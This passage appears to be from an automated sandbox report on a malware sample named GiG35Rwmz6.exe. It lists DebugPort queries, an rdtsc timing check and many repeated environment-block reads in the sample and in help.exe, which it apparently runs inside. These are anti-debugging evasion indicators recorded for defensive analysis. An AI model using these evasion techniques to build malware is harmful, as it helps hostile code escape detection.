Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Code function: 4_2_00409A90 rdtsc

4_2_00409A90

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Code function: 4_2_0040ACD0 LdrLoadDll,

4_2_0040ACD0

Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]	9_2_02A852A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]	9_2_02A852A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]	9_2_02A852A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]	9_2_02A852A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]	9_2_02A852A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B50EA5 mov eax, dword ptr fs:[00000030h]	9_2_02B50EA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B50EA5 mov eax, dword ptr fs:[00000030h]	9_2_02B50EA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B50EA5 mov eax, dword ptr fs:[00000030h]	9_2_02B50EA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B046A7 mov eax, dword ptr fs:[00000030h]	9_2_02B046A7
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]	9_2_02A9AAB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]	9_2_02A9AAB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABFAB0 mov eax, dword ptr fs:[00000030h]	9_2_02ABFAB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1FE87 mov eax, dword ptr fs:[00000030h]	9_2_02B1FE87
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABD294 mov eax, dword ptr fs:[00000030h]	9_2_02ABD294
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABD294 mov eax, dword ptr fs:[00000030h]	9_2_02ABD294
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB16E0 mov ecx, dword ptr fs:[00000030h]	9_2_02AB16E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A976E2 mov eax, dword ptr fs:[00000030h]	9_2_02A976E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2AE4 mov eax, dword ptr fs:[00000030h]	9_2_02AB2AE4
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2ACB mov eax, dword ptr fs:[00000030h]	9_2_02AB2ACB
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B58ED6 mov eax, dword ptr fs:[00000030h]	9_2_02B58ED6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB36CC mov eax, dword ptr fs:[00000030h]	9_2_02AB36CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC8EC7 mov eax, dword ptr fs:[00000030h]	9_2_02AC8EC7
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B3FEC0 mov eax, dword ptr fs:[00000030h]	9_2_02B3FEC0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8E620 mov eax, dword ptr fs:[00000030h]	9_2_02A8E620
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B3FE3F mov eax, dword ptr fs:[00000030h]	9_2_02B3FE3F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A98A0A mov eax, dword ptr fs:[00000030h]	9_2_02A98A0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8C600 mov eax, dword ptr fs:[00000030h]	9_2_02A8C600
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8C600 mov eax, dword ptr fs:[00000030h]	9_2_02A8C600
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8C600 mov eax, dword ptr fs:[00000030h]	9_2_02A8C600
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB8E00 mov eax, dword ptr fs:[00000030h]	9_2_02AB8E00
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA3A1C mov eax, dword ptr fs:[00000030h]	9_2_02AA3A1C
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABA61C mov eax, dword ptr fs:[00000030h]	9_2_02ABA61C
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABA61C mov eax, dword ptr fs:[00000030h]	9_2_02ABA61C
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8AA16 mov eax, dword ptr fs:[00000030h]	9_2_02A8AA16
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8AA16 mov eax, dword ptr fs:[00000030h]	9_2_02A8AA16
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9766D mov eax, dword ptr fs:[00000030h]	9_2_02A9766D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B3B260 mov eax, dword ptr fs:[00000030h]	9_2_02B3B260
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B3B260 mov eax, dword ptr fs:[00000030h]	9_2_02B3B260
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC927A mov eax, dword ptr fs:[00000030h]	9_2_02AC927A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B58A62 mov eax, dword ptr fs:[00000030h]	9_2_02B58A62
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]	9_2_02AAAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]	9_2_02AAAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]	9_2_02AAAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]	9_2_02AAAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]	9_2_02AAAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B14257 mov eax, dword ptr fs:[00000030h]	9_2_02B14257
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]	9_2_02A89240
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]	9_2_02A89240
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]	9_2_02A89240
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]	9_2_02A89240
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]	9_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]	9_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]	9_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]	9_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]	9_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]	9_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B55BA5 mov eax, dword ptr fs:[00000030h]	9_2_02B55BA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B07794 mov eax, dword ptr fs:[00000030h]	9_2_02B07794
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B07794 mov eax, dword ptr fs:[00000030h]	9_2_02B07794
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B07794 mov eax, dword ptr fs:[00000030h]	9_2_02B07794
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A91B8F mov eax, dword ptr fs:[00000030h]	9_2_02A91B8F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A91B8F mov eax, dword ptr fs:[00000030h]	9_2_02A91B8F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B3D380 mov ecx, dword ptr fs:[00000030h]	9_2_02B3D380
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABB390 mov eax, dword ptr fs:[00000030h]	9_2_02ABB390
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A98794 mov eax, dword ptr fs:[00000030h]	9_2_02A98794
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B4138A mov eax, dword ptr fs:[00000030h]	9_2_02B4138A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]	9_2_02AB03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]	9_2_02AB03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]	9_2_02AB03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]	9_2_02AB03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]	9_2_02AB03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]	9_2_02AB03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC37F5 mov eax, dword ptr fs:[00000030h]	9_2_02AC37F5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B053CA mov eax, dword ptr fs:[00000030h]	9_2_02B053CA
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B053CA mov eax, dword ptr fs:[00000030h]	9_2_02B053CA
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A84F2E mov eax, dword ptr fs:[00000030h]	9_2_02A84F2E
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A84F2E mov eax, dword ptr fs:[00000030h]	9_2_02A84F2E
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABE730 mov eax, dword ptr fs:[00000030h]	9_2_02ABE730
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1FF10 mov eax, dword ptr fs:[00000030h]	9_2_02B1FF10
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1FF10 mov eax, dword ptr fs:[00000030h]	9_2_02B1FF10
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABA70E mov eax, dword ptr fs:[00000030h]	9_2_02ABA70E
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABA70E mov eax, dword ptr fs:[00000030h]	9_2_02ABA70E
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B4131B mov eax, dword ptr fs:[00000030h]	9_2_02B4131B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B5070D mov eax, dword ptr fs:[00000030h]	9_2_02B5070D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B5070D mov eax, dword ptr fs:[00000030h]	9_2_02B5070D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAF716 mov eax, dword ptr fs:[00000030h]	9_2_02AAF716
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8DB60 mov ecx, dword ptr fs:[00000030h]	9_2_02A8DB60
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9FF60 mov eax, dword ptr fs:[00000030h]	9_2_02A9FF60
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB3B7A mov eax, dword ptr fs:[00000030h]	9_2_02AB3B7A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB3B7A mov eax, dword ptr fs:[00000030h]	9_2_02AB3B7A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B58F6A mov eax, dword ptr fs:[00000030h]	9_2_02B58F6A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8DB40 mov eax, dword ptr fs:[00000030h]	9_2_02A8DB40
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9EF40 mov eax, dword ptr fs:[00000030h]	9_2_02A9EF40
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B58B58 mov eax, dword ptr fs:[00000030h]	9_2_02B58B58
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8F358 mov eax, dword ptr fs:[00000030h]	9_2_02A8F358
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC90AF mov eax, dword ptr fs:[00000030h]	9_2_02AC90AF
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABF0BF mov ecx, dword ptr fs:[00000030h]	9_2_02ABF0BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABF0BF mov eax, dword ptr fs:[00000030h]	9_2_02ABF0BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABF0BF mov eax, dword ptr fs:[00000030h]	9_2_02ABF0BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89080 mov eax, dword ptr fs:[00000030h]	9_2_02A89080
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9849B mov eax, dword ptr fs:[00000030h]	9_2_02A9849B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B03884 mov eax, dword ptr fs:[00000030h]	9_2_02B03884
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B03884 mov eax, dword ptr fs:[00000030h]	9_2_02B03884
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06CF0 mov eax, dword ptr fs:[00000030h]	9_2_02B06CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06CF0 mov eax, dword ptr fs:[00000030h]	9_2_02B06CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06CF0 mov eax, dword ptr fs:[00000030h]	9_2_02B06CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B414FB mov eax, dword ptr fs:[00000030h]	9_2_02B414FB
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]	9_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]	9_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]	9_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]	9_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]	9_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B58CD6 mov eax, dword ptr fs:[00000030h]	9_2_02B58CD6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]	9_2_02A9B02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]	9_2_02A9B02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]	9_2_02A9B02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]	9_2_02A9B02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]	9_2_02AB002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]	9_2_02AB002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]	9_2_02AB002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]	9_2_02AB002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]	9_2_02AB002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABBC2C mov eax, dword ptr fs:[00000030h]	9_2_02ABBC2C
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B54015 mov eax, dword ptr fs:[00000030h]	9_2_02B54015
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B54015 mov eax, dword ptr fs:[00000030h]	9_2_02B54015
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B07016 mov eax, dword ptr fs:[00000030h]	9_2_02B07016
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B07016 mov eax, dword ptr fs:[00000030h]	9_2_02B07016
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B07016 mov eax, dword ptr fs:[00000030h]	9_2_02B07016
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]	9_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B5740D mov eax, dword ptr fs:[00000030h]	9_2_02B5740D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B5740D mov eax, dword ptr fs:[00000030h]	9_2_02B5740D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B5740D mov eax, dword ptr fs:[00000030h]	9_2_02B5740D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]	9_2_02B06C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]	9_2_02B06C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]	9_2_02B06C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]	9_2_02B06C0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B51074 mov eax, dword ptr fs:[00000030h]	9_2_02B51074
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B42073 mov eax, dword ptr fs:[00000030h]	9_2_02B42073
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA746D mov eax, dword ptr fs:[00000030h]	9_2_02AA746D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABA44B mov eax, dword ptr fs:[00000030h]	9_2_02ABA44B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1C450 mov eax, dword ptr fs:[00000030h]	9_2_02B1C450
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B1C450 mov eax, dword ptr fs:[00000030h]	9_2_02B1C450
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA0050 mov eax, dword ptr fs:[00000030h]	9_2_02AA0050
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA0050 mov eax, dword ptr fs:[00000030h]	9_2_02AA0050
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB35A1 mov eax, dword ptr fs:[00000030h]	9_2_02AB35A1
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB61A0 mov eax, dword ptr fs:[00000030h]	9_2_02AB61A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB61A0 mov eax, dword ptr fs:[00000030h]	9_2_02AB61A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]	9_2_02B051BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]	9_2_02B051BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]	9_2_02B051BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]	9_2_02B051BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B069A6 mov eax, dword ptr fs:[00000030h]	9_2_02B069A6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB1DB5 mov eax, dword ptr fs:[00000030h]	9_2_02AB1DB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB1DB5 mov eax, dword ptr fs:[00000030h]	9_2_02AB1DB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB1DB5 mov eax, dword ptr fs:[00000030h]	9_2_02AB1DB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]	9_2_02A82D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]	9_2_02A82D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]	9_2_02A82D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]	9_2_02A82D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]	9_2_02A82D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AAC182 mov eax, dword ptr fs:[00000030h]	9_2_02AAC182
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2581 mov eax, dword ptr fs:[00000030h]	9_2_02AB2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2581 mov eax, dword ptr fs:[00000030h]	9_2_02AB2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2581 mov eax, dword ptr fs:[00000030h]	9_2_02AB2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABA185 mov eax, dword ptr fs:[00000030h]	9_2_02ABA185
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABFD9B mov eax, dword ptr fs:[00000030h]	9_2_02ABFD9B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABFD9B mov eax, dword ptr fs:[00000030h]	9_2_02ABFD9B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2990 mov eax, dword ptr fs:[00000030h]	9_2_02AB2990
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B38DF1 mov eax, dword ptr fs:[00000030h]	9_2_02B38DF1
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]	9_2_02A8B1E1
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]	9_2_02A8B1E1
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]	9_2_02A8B1E1
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]	9_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]	9_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B141E8 mov eax, dword ptr fs:[00000030h]	9_2_02B141E8
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B58D34 mov eax, dword ptr fs:[00000030h]	9_2_02B58D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B0A537 mov eax, dword ptr fs:[00000030h]	9_2_02B0A537
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120 mov ecx, dword ptr fs:[00000030h]	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB4D3B mov eax, dword ptr fs:[00000030h]	9_2_02AB4D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB4D3B mov eax, dword ptr fs:[00000030h]	9_2_02AB4D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB4D3B mov eax, dword ptr fs:[00000030h]	9_2_02AB4D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB513A mov eax, dword ptr fs:[00000030h]	9_2_02AB513A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB513A mov eax, dword ptr fs:[00000030h]	9_2_02AB513A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8AD30 mov eax, dword ptr fs:[00000030h]	9_2_02A8AD30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]	9_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89100 mov eax, dword ptr fs:[00000030h]	9_2_02A89100
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A89100 mov eax, dword ptr fs:[00000030h]	9_2_02A89100
